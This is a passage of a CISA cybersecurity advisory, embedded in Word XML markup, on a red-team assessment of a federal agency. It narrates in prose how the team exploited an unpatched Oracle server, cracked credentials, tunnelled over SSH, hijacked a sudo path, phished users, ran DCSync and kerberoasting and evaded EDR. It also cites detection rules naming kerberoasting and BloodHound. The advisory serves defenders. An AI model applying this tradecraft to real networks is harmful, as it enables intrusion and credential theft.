        <w:t>Work with security information and event management (SIEM) and security orchestration, automation, and response (SOAR) providers-in conjunction with customers-to understand how response teams use logs to investigate incidents.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Download the PDF version of this report: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AA24-193A CISA Red Team's Operations Against a Federal Civilian Executive Branch Organization Highlights the Necessity of Defense-in-Depth (PDF, 1.17 MB ) INTRODUCTION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CISA has authority to hunt for and identify, with or without advance notice to or authorization from agencies, threats and vulnerabilities within federal information systems (see generally 44 U.S.C. SS 3553[b][7]). The target organization for this assessment was a large U.S. FCEB organization. CISA conducted the SILENTSHIELD assessment over an approximately eight- month period in 2023, with three of the months consisting of a technical collaboration phase: Adversary Emulation Phase: The team started by emulating a sophisticated nation-state actor by simulating known initial access and post-exploitation TTPs. The team's goal was to compromise the assessed organization's domain and identify attack paths to other networks. After completion of their initial objectives, the team diversified its deployed tools and tradecraft to mimic a wider and often less sophisticated set of threat actors to elicit network defender attention. CISA red team members did not clean up or delete system logs, allowing defenders to investigate all artifacts and identify the full scope of a breach.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Collaboration Phase: The SILENTSHIELD team met regularly with senior staff and technical personnel to discuss issues with the organization's cyber defensive capabilities. During this phase, the team: Proposed new behavior-based and tool-agnostic detections to uncover additional tradecraft used during the Adversary Emulation Phase. They also evaluated the organization's improvements according to current CISA priorities and public guidance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Troubleshot existing detection steps to show how certain TTPs evaded IOC- based detections.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Deconflicted events from CISA red team activity, indicating unexpected network/application behavior or the potential presence of a real adversary in the network.</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Note: The team's goal during this phase was to build the organization's ability to detect malicious activity based on adversary behavior (i.e., TTPs) vice relying on known IOCs.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advisory, drafted in coordination with the assessed organization, details the red team's activity and TTPs, associated network defense activity, and lessons learned to provide network defenders recommendations for improving their organization's defensive cyber posture. The advisory also provides recommendations to software manufacturers to harden their customer networks against malicious activity and reduce the likelihood of domain compromise. TECHNICAL DETAILS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Note: This advisory uses the MITRE ATT&amp;CK for Enterprise framework, version 15. See the MITRE ATT&amp;CK Tactics and Techniques section for a table of the threat actors' activity mapped to MITRE ATT&amp;CK(R) tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK's Best Practices for MITRE ATT&amp;CK Mapping and CISA's Decider Tool.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During the Adversary Emulation phase, the red team gained initial access to the organization's Solaris enclave by exploiting a known vulnerability in an unpatched web server. They gained separate access to the Windows environment by phishing and were able to compromise the full domain and its parent domain. See Figure 1 for a timeline of this assessment and the sections below for details on the team's activity and TTPs.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 SILENTSHIELD assessment timeline Adversary Emulation Phase Exploitation of the Solaris Enclave Reconnaissance, Initial Access, and Command and Control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CISA's red team used open source tools and third-party services to probe the organization's internet-facing surface [T1594]. This included non- intrusive port scans for common ports and Domain Name System (DNS) enumeration [T1590.002]. These efforts revealed the organization's web server was unpatched for CVE-2022-21587, an unauthenticated remote code execution (RCE) vulnerability in Oracle Web Applications Desktop Integrator. For three months the assessed organization failed to patch this vulnerability, and the team exploited it for initial access.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exploit provided code execution on a backend application server (SERVER 1) that handled incoming requests from the public-facing web server. The red team used this exploit to upload and run a secure Python remote access tool (RAT). Because the application server had full external internet egress via Transmission Control Protocol (TCP) ports 80 and 443, the RAT enabled consistent command and control (C2) traffic [T1071.001].</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Note: After gaining access, the team promptly informed the organization's trusted agents of the unpatched device, but the organization took over two weeks to apply the available patch. Additionally, the organization did not perform a thorough investigation of the affected servers, which would have turned up IOCs and should have led to a full incident response. About two weeks after the team obtained access, exploit code was released publicly into a popular open source exploitation framework. CISA identified that the vulnerability was exploited by an unknown third party. CISA added this CVE to its Known Exploited Vulnerabilities Catalog on Feb. 2, 2023. Credential Access, Command and Control, and Privilege Escalation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Once on SERVER 1, the red team probed the host's files and folder structure [T1005] and identified several old and globally accessible .tar backup files, which included a readable copy of an /etc/shadow file containing the hash for a privileged service account (ACCOUNT 1). The team quickly cracked the account's weak password using a common wordlist [T1110.002]. They then established an outbound Secure Shell Protocol (SSH) connection over TCP port 80 and used a reverse tunnel to SSH back into SERVER 1, where they were prompted to reset ACCOUNT 1's expired password [T1571] (see Figure 2). The team identified the account was enabled on a subset of containers, but it had not been actively used in a significant amount of time; the team changed this account's password to a strong password.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2: Exploitation of the Solaris Enclave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team discovered ACCOUNT 1 was a local administrator with sudo/root access and used it to move laterally (see the next section). Lateral Movement and Persistence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Servers in the Solaris enclave did not use centralized authentication but had a mostly uniform set of local accounts and permissions [T1078.002]. This allowed the red team to use ACCOUNT 1 to move through much of the network segment via SSH [T1021.004].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servers allowed external internet access and the team deployed RATs on a few of these hosts for C2. They deployed several different RATs to diversify network traffic signatures and obfuscate the on-disk and in- memory footprints. These tools communicated to a red team redirector over TCP/443, through valid HTTPS messages, and over SSH through non-standard ports (80 and 443) [T1571]. Much of the traffic was not blocked by a firewall, and the organization lacked application layer firewalls capable of detecting protocol mismatches on common ports.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team then moved laterally to multiple servers, including high value assets, that did not allow internet access. Using reverse SSH tunnels, the team moved into the environment and used a SOCKS proxy [T1090] to progress forward through the network. They configured implants with TCP bind listeners bound to random high ports to connect directly with some of these hosts without creating new SSH login events (see Figure 3).</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3: Example of Lateral Movement in the Solaris Enclave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Once on other internal hosts, the team data mined each for sensitive information and credentials. They obtained personally identifiable information (PII), shadow files, a crackable pass-phrase protected administrator SSH key, and a plaintext password [T1552.003] in a user's .bash_history. These data mined credentials provided further avenues </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>for unprivileged access through the network. The team also used SSH tunnels to remotely mount Network File System (NFS) file shares, spoofing uid and gid values to access all files and folders.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To protect against reboots or other disruptions, the team primarily persisted on hosts using the cron utility [T1053.003], as well as the at utility [T1053.002], to run scheduled tasks and blend into the environment. Additionally, SSH private keys provided persistent access to internal pivot hosts and would have continued to enable access even if passwords were rotated. Full Enclave Compromise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Although ACCOUNT 1 allowed the team to move laterally to much of the Solaris enclave, the account did not provide privileged access to all hosts in the network because a subset of hosts had changed the password (which denied privileged access via that account). However, the team analyzed recent user logins using the last command and identified a network security appliance scanning service account (ACCOUNT 2) that logged in regularly to an internal host using password-based authentication. As part of its periodic vulnerability scanning, ACCOUNT 2 would connect to each host via SSH and run sudo with a relative path instead of the absolute path /usr/local/bin/sudo. The local path created a path hijack vulnerability, which allowed the red team to hijack the execution flow and capture the account's password [T1574.007].</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harvested password granted unrestricted privileged access to the entire Solaris enclave. Exploitation of the Windows Domain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the compromise of the Solaris enclave facilitated months of persistent access to sensitive systems, including web applications and databases, it did not lead to the immediate compromise of the corporate Windows environment. Once in the Windows domain, the red team identified several service accounts with weak passwords. It is likely that an adversary could have continued the Solaris attack path through prolonged password spraying attacks, or by leveraging credentials obtained externally (e.g., dark web credential dumps) (see Figure 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4: Exploitation of Solaris enclave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team exploited the Windows domain through other access vectors and eventually proved the undetected pivot between the domains could be made after they obtained Windows credentials. Reconnaissance and Initial Access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attempting to pivot into Windows from Solaris, the red team conducted open source information gathering about the organization. They harvested employee names [T1589.003] and used the information to derive email addresses based on the target's email naming scheme. After identifying names, emails, and job titles, the team selected several phishing targets who regularly interacted with the public [T1591.004]. One user triggered a phishing payload that provided initial access to a workstation.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team then placed a simple initial access RAT on the workstation in a user-writable folder and obtained user-level persistence through an added registry run key, which called back to a red team redirector via HTTPS. The team assessed what was running on the host in terms of antivirus (AV) and Endpoint Detection and Response (EDR) and used the implant to inject a more capable, full-fledged RAT directly into memory, which pointed to a separate redirector. The assessed organization's tools failed to categorize C2 traffic as anomalous even when a bug in one of the implants caused 8 GB of continuous network traffic to flow in one afternoon. Credentialed Access and Privilege Escalation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Internal network information was freely available to unprivileged, domain- joined users, and the team queried hundreds of megabytes of Active Directory (AD) data using a custom rewrite of dsquery.exe in .NET and Beacon Object File (BOF) ldapsearch from the phished user's workstation. The team then data mined numerous internal file servers for accessible shares [T1083]. The team found a password file left from a previous employee on an open, administrative IT share, which contained plaintext usernames and passwords for several privileged service accounts. With the harvested Lightweight Directory Access Protocol (LDAP) information, the team identified one of the accounts (ACCOUNT 3) had system center operations manager (SCOM) administrator privileges and domain administrator privileges for the parent domain. They identified another account (ACCOUNT 4) that also had administrative permissions for most servers in the domain. The passwords for both accounts had not been updated in over eight years and were not enrolled in the organization's identity management (IDM). Lateral Movement and Persistence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team used valid accounts and/or tokens with varied techniques for lateral movement. Techniques included scheduled task manipulation, service creation, and application domain hijacking [T1574.014]. For credential usage, the implemented IDM in the organization's network hampered the red team's ability to pivot as it blocked common credential manipulation techniques like pass-the-hash [T1550.002] and pass-the-ticket [T1550.003]. The red team found ways to circumvent the IDM, including using plaintext passwords to create genuine network logon sessions [T1134.003] for certain accounts not registered with the IDM, as well as impersonating the tokens of currently logged-in users to piggyback off valid sessions [T1134.001].</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red team tailored payloads to blend with the network's environment and did not reuse IOCs like filenames or file hashes, especially for persisted implants. Remote queries for directory listings, scheduled tasks, services, and running processes provided the information for the red team to masquerade as legitimate activity [T1036.004].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team emulated normal network activity by installing HTTPS beaconing agents on workstations where normal users browse the web, establishing internal network pivots with TCP bind and SMB listeners. They primarily relied on creating Windows services as their persistence mechanism.</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red team used the data mined credentials for ACCOUNT 3 to move laterally from the workstation to a SCOM server. Once there, using ACCOUNT 4, the team targeted a Systems Center Configurations Manager (SCCM) server, as it was an advantageous network vantage point. The SCCM server had existing logged-in server administrators whose usernames followed a predictable naming pattern (correlating administrative roles and privilege levels), allowing them to determine which account to use to pivot to other hosts.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The team targeted the organization's jump servers frequented by highly privileged administrative accounts. Red team operators used stolen SCCM server administrator credentials to compromise one of the organization's server-administrator jump hosts. They learned that the organization separated some, but not all, accounts onto separate jump servers by role (e.g., workstation administrators and server administrators had separate jump points, but server and domain administrators occasionally shared the same jump hosts). Once a domain administrator logged in, the red team stole the administrator's session token and laterally moved to a domain controller where they pulled credentials for the entire domain via DCSync [T1003.006], obtaining full domain compromise (see Figure 5).</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5: Exploitation of the Windows Domain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compromising the domain, the team confirmed access to sensitive servers, including multiple high value assets (HVAs) and tier zero assets. None of the accessed servers had any noticeable additional protections or network access restrictions despite their sensitivity and critical functions in the network. Remote administration and access of these critical systems should be restricted to designated, role-based accounts coming from specific network enclaves and/or workstations. Isolation with these access vector limitations protects them from compromise and sharply reduces the associated noise, allowing defenders to more easily identify abnormal behavior. Pivoting Into External Trusted Partners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team inspected the organization's trust relationships with other organizational domains through LDAP [T1482] and identified connections to multiple external FCEB partner organizations, one of which they subsequently used to move laterally.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team pulled LDAP information from PARTNER DC 1 and kerberoasted the domain, yielding one valid service account with a weak password they quickly cracked, but the team was unable to move laterally with this account because it lacked appropriate privileges. However, PARTNER 1 had trusted relationships with a second partner's domain controller (PARTNER DC 2). Using the acquired PARTNER 1 credentials, the red team discovered PARTNER 2 also had a kerberoastable, highly privileged administrative service account whose password cracked, allowing the team to laterally move to a PARTNER 2 host from the original victim network (see Figure 6).</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6: path of exploitation into external fceb organizations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These cross-organizational attack paths are rarely identified or tested in regular assessments or audits due to network ownership, legal agreements, and/or vendor opacity. However, they remain a valuable access vector for advanced persistent threat (APT) actors.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Experimentation with access into trusted partner domains included the modification of local system firewall rules on the source domain controller to allow specific source and destination IPs. The organization's host-based monitoring systems failed to identify the addition and removal of the red team's firewall exceptions. Defense Evasion Techniques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Solaris Enclave Figure 5: Exploitation of the Windows Domain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Due to the lack of application allowlisting, the red team regularly masqueraded as legitimate software to remain undetected by the organization's network defenders [T1036]. Additionally, by default, command auditing in Solaris via the lastcomm command only captures the program being run-full file path and any command line arguments are not recorded. For example: A real file: /opt/splunkforwarder/bin/splunkd A malicious copy: /opt/splunkforwarder/splunkd Command auditing logs: splunkd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team also hid common artifacts to obfuscate their operational activity, including modifying file timestamps [T1070.006] and permissions with the touch and chmod/chown commands [T1222.002] to blend with other files in the environment.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Windows Domain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team used a diverse range of accounts, backdoors, and C2 channels with different network footprints to obfuscate activity [T1027].</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Diversification of account usage, backdoors, and C2 channels further obfuscated red team activity in the domain. Lateral movement to new hosts featured a variety of accounts to reduce the risk of detection. When harvesting credentials, the team selected several backup accounts for each role (e.g., server admin, workstation admin, domain admin, service accounts) in case the intended account was locked, disabled, or flagged as compromised.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 emphasize the value of tool-agnostic/behavior-based detections, the red team deployed over seven different implants to mimic real-world adversaries' diverse use of open source, commercial off-the-shelf (COTS), and custom RATs. Each featured different host and network signatures to evade out-of-the-box EDR detections and every implant had unique artifacts both on-disk and in-memory. The team also evaded EDR/AV by using proprietary loaders and beacon object files (BOFs) to make direct API calls and allow self-injection of .NET executables to run additional capabilities.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All the deployed tools had different network C2 channel footprints. Some beaconing agents connected via HTTPS to legitimate domains owned by the red team. Others used domain fronting [T1090.004] to leverage common content delivery network (CDN) functionality. Outbound traffic sent to public websites not owned by the red team had a Host header that told the CDN provider it should redirect traffic to red-team-controlled IP addresses. Internal pivots used SMB on port 445 and TCP bind listeners on ephemeral high ports. The team tailored both to mimic named pipes and network connections already seen in the domain and evade detection. Collaborative Phase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Five months into the assessment, the red team officially notified the organization's security operations center (SOC) of the ongoing activity and began engaging directly with SOC leadership. At this point, the organization had not submitted deconflictions and did not appear to be actively investigating CISA SILENTSHIELD assessment activity.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During this phase, CISA refrained from providing TTPs or IOCs (such as concrete hosts, filenames, or C2 domains) to allow the organization to develop and test its own detection metrics. The team held weekly discussions with the organization's senior technical staff, SOC, and system administrators, which led to measurable improvements in response times for known techniques and behavior-based detections that uncovered previously unknown tradecraft. Specifically, the red team worked with the organization to assist them with synthesizing the following data sources to identify the extent of the red team's compromise: EDR alerts; YARA scans; C2 domains and techniques; Internal pivot hosts; Admin accounts used to pivot; Memory dumps, revealing attempts to pass credentials; and Email logs documenting the initial breach via phishing.</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Every cyber threat actor has a unique set of TTPs. Nevertheless, nearly all adversaries perform the same basic steps: Command execution (initial access and lateral movement); Establish C2 channels and exfiltrate data; Establish persistence; Escalate privileges; and Use and abuse credentials.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All TTPs have corresponding artifacts, but not all IOCs are created equal. Fixating on a hyper-focused set of IOCs can catch known threats but impedes efforts to identify unknown adversaries employing different TTPs.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Major themes discussed during this phase that improved the organization's behavior-based detection capabilities included log collection, forensic analysis, relying on IOCs for detection, monitoring and investigation management, and Sysmon misconfigurations. Log Collection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assessed organizations had ineffective and insufficient logs, and network defenders were not using logs to proactively detect anomalous behavior. With the red team's assistance, the organization identified logging issues caused by hardware failures, limited backups, network bandwidth, and limited log collection and retention policies (only 60-90 days). In other cases, critical data was captured but not analyzed because artifacts were moved to cold storage.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organization's network defenders identified procedural and other roadblocks when attempting to acquire new forensic data. For example, affected servers could not be taken offline for imaging because there was no process in place to do so without impacting the organization's operations. Additionally, attempts to capture forensic data via packet captures occurred directly on the compromised Solaris and Windows hosts, where the red team observed the data being collected and therefore had the opportunity to disrupt collection, tamper with evidence files, and better adapt and evade their defenses. Forensic Analysis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Defenders did not monitor C2 egress via DNS. They believed their parent entity was monitoring their DNS traffic, absolving them of a need to collect and monitor logs for their analyses.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Forensic analysts blindly trusted the timestamps for files and persistence mechanisms without realizing they had been tampered with. Bogus times added to persistence mechanisms (such as scheduled tasks) led defenders to misjudge the timeline of the breach. Red team operators regularly adjusted the last-modified timestamp of files and folders-using either the native touch -r command or implants' timestomp command to disguise the last- modified timestamp captured in the output of ls -la. Secondary file timestamps identified with ls -lu or ls -lc would have revealed abnormal file attributes, in addition to more reliable anomalies found during proper forensic investigation. Reliance on Known IOCs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red team used diversified TTPs in the Adversary Emulation phase to reflect the ability of cyber threat actors to bypass conventional, known- bad detection strategies. The network defenders did not detect much of the team's activity. For example: After identifying a red team payload, network defenders wrote tailored YARA rules that signatured specific behavior of the red team's loader, which uncovered several similar payloads but failed to catch any of the other six C2 frameworks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Organization network defenders used a combination of custom and open source detection rules (such as CommandLine=kerberoast* or files called bloodhound.zip) and did not detect the team's kerberoasting activity. Regular Monitoring and Investigation Management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Conversations with SOC leadership revealed several procedural issues that led to slow or incomplete analysis of the red team's intrusion and activity. For example: While EDR products detected and quarantined several of the red team's tools, including the initial phishing payload, the organization's daily procedures did not always include review of EDR alerts. The red team worked with the organization to ensure rapid response to EDR alerts became a fundamental part of network defenders' daily workflows. This allowed SOC personnel to identify new attempts at lateral movement.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Solaris network owners discovered that several firewalls had inadvertently been misconfigured or disabled. The organization's technical teams worked directly with the red team to fix errors and to reorganize and revalidate the network topology.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Network defenders had poor operational security and alerted the red team of investigations. For example: In one instance, after receiving incoming beacons from what was evidently a sandboxed environment, the payload was not renamed from its original file, allowing the red team to immediately identify how much of their access was under scrutiny. Organizations must ensure sandboxed environments are safe, secure, and thoroughly sandboxed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The red team observed system administrators reviewing forensic artifacts tied to the team's Solaris payload-searching for files, running packet captures for outbound C2 traffic, and port scanning the C2 redirector. Team members simply reinstalled their persistence with a new redirector and file path, sidestepping the informal investigation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">IT teams were siloed from the SOC, who had no knowledge of the system administrator's weeks long investigation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>into the anomalous network behavior.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>While the organization compartmented most of its threat hunting and incident response in a separate domain, staff still used the compromised corporate domain accounts to communicate the details of active investigations and assessments. Sysmon Misconfigurations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red team had a productive exchange with the organization on their Sysmon configuration, which the team abused throughout the assessment. The red team identified several misconfigurations: Deployment teams pushed the ruleset (stored as a .xml file) to a globally readable C:\Windows directory. There were no rules in place to catch adversaries reading the configurations from disk or the registry. As a result, CISA's red team was provided explicit file paths to safely place their payloads.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Rules targeted a single, tool-specific IOC rather than a technique (e.g., sc.exe rather than service creation events).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Exceptions were overly permissive (for example, excluding all Image entries anywhere in C:\Program Files (x86)\Google\Update\*). LESSONS LEARNED AND KEY FINDINGS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red team noted the following lessons learned and key findings relevant to the security of the assessed organization's network. These specific findings contributed to the team's ability to gain persistent access across the organization's network. See the Mitigations section for recommendations on how to address these findings. Lesson Learned: The assessed organization had insufficient controls to prevent and detect malicious activity. Finding #1: The organization's perimeter network was not adequately firewalled from its internal network, which failed to restrict outbound traffic. A majority of the organization's hosts, including domain controllers, had internet connectivity to broad AWS EC2 ranges, allowing the red team to make outbound web requests without triggering IDS/IPS responses. These successful connections revealed the lack of an application layer firewall capable of detecting protocol mismatches on common ports. Finding #2: The assessed organization had insufficient network segmentation. The lack of network segmentation allowed the red team to move into, within, and out of both the Solaris and Windows domain. This also enabled them to gather a massive amount of data about the organization and its systems. Internal servers could reach almost any other domain host, regardless of type (server vs. workstation), purpose (user laptop, file server, IDM server, etc.), or physical location. Use of network address translation (NAT) between different parts of the network further obfuscated data streams, hindering incident response.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #3: The organization had trust relationships with multiple partner organizations, which-when combined with weak credentials and network connectivity-allowed the red team to exploit and move laterally to a partner domain controller. This highlights the risk of blindly allowing third party network connectivity and the importance of regularly monitoring both privileged access and transitive trusted credential material.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #4: The organization's defensive staff did not sufficiently isolate their defensive investigative activity. Organizations should always communicate information pertaining to suspected incidents out-of-band, rather than from within a domain that they know to be compromised. While the defensive systems were shunted to another domain with correct (one-way) trusts, the red team identified a likely attack vector to that domain via the same, previously compromised IDM server. Some analysts also performed dynamic analysis of suspected implants from an internet-connected sandbox, tipping the red team to the specific files and hosts that were under investigation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #5: Network defenders were not familiar with the intricacies of their IDM solution. The CISA red team identified accounts not enrolled in the IDM and successfully used those and already existing user access tokens to bypass IDM. The appliance, in its active configuration, was not exhaustively tested against common credential manipulation techniques nor were any alerts on anomalous behavior being monitored.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #6: The organization had some role-based host segmentation, but it was not granular enough. The organization used clearly defined roles (server administrator and domain administrator) but did not sufficiently segregate the accounts to their own servers or systems, enabling privilege escalation. Lesson Learned: The organization did not effectively or efficiently collect, retain, and analyze logs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #7: Defensive analysts did not have the information they needed due to a combination of issues with collecting, storing, and processing logs. Other policies collected too much useless data, generating noise and slowing investigation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #8: Network defenders' daily procedures did not always include analysis of EDR alerts, and the tools that were installed only provided a 30-day retention for quarantined files. Consequently, investigators were unable to access timely information that may have led to earlier detection of the red team's activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #9: Forensic analysts trusted host artifacts that could have been modified by an adversary. In particular, file timestamps and packet captures were scrutinized without considering the possibility of malicious tampering. Lesson Learned: Bureaucratic communication and decentralized teams hindered the organization's network defenders.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #10: The organization's technical staff were spread across decentralized teams. Siloed team structure meant that IT, security, and other technical teams lacked consistency with their tools, creating too much noise for defenders to sift through.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Finding #11: The SOC team lacked the agency to rapidly update or deploy rulesets through the fractured IT teams. The organization diffused responsibility for individual tools, such as Sysmon, across multiple groups, hampering timeliness and maintenance of a defensive posture. Finding #12: The organization's forensics team produced an incident response report which documented the red team's initial exploitation of the Solaris enclave. However, the report was limited in scope and did not adequately document the red team's ability to expand and persist. The success of the red team's first phase, using publicly known TTPs, illustrated the business risk to all Solaris hosts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>and, by extension, the Windows environment. Moreover, the organization's internal report only focused on vulnerable servers and did not account for a cyber threat actor's ability to expand and persist in the Solaris enclave.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Solaris administrator's investigations of the red team failed to appear in either the report or in SOC deconflictions. An admin's inquiry into unusual and probably malicious activity, particularly in the middle of an investigation of confirmed breaches of adjacent hosts, should have been considered in the report as evidence of lateral movement. Lesson Learned: A "known-bad" detection approach hampered detection of alternate TTPs. Finding #13: Defenders hyper-focused on specific IOCs, such as file attributes, particular C2 frameworks, or C2 domains. The organization's network defenders did not initially employ tool-agnostic detections, causing them to positively identify some red team tools, but remain blind to the full extent of the compromise. They were accustomed to catching internal red teams that used specific TTPs; introducing a new "threat actor" with new TTPs sidestepped nearly all detections.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #14: Detection rules were visible from compromised systems, allowing the red team to sidestep detections based on hardcoded rules and exceptions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #15: There was insufficient restriction of administrative tools. The technical staff lacked a standardized set of administrative tools, leaving all remote administration protocols available for use by admins, CISA red team, or adversaries. This also created excessive noise for defenders to effectively sift through to determine expected versus anomalous activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #16: There was insufficient tracking of software. There was no apparent approval or tracking process for software installation across the domain, preventing defensive analysts from identifying abnormal software placed by the red team. A comprehensive inventory of approved software would help defenders identify abnormal behavior and facilitate the deployment of application allow-listing. NOTED STRENGTHS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assessed organization promptly planned for and resolved multiple identified issues, including with: Windows service accounts: The organization eliminated over 30 percent of service accounts which were deemed unnecessary. There is an on-going effort to change service account passwords and apply DoD recommended STIG compliance (over 85 percent have been changed since the publication of this report).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
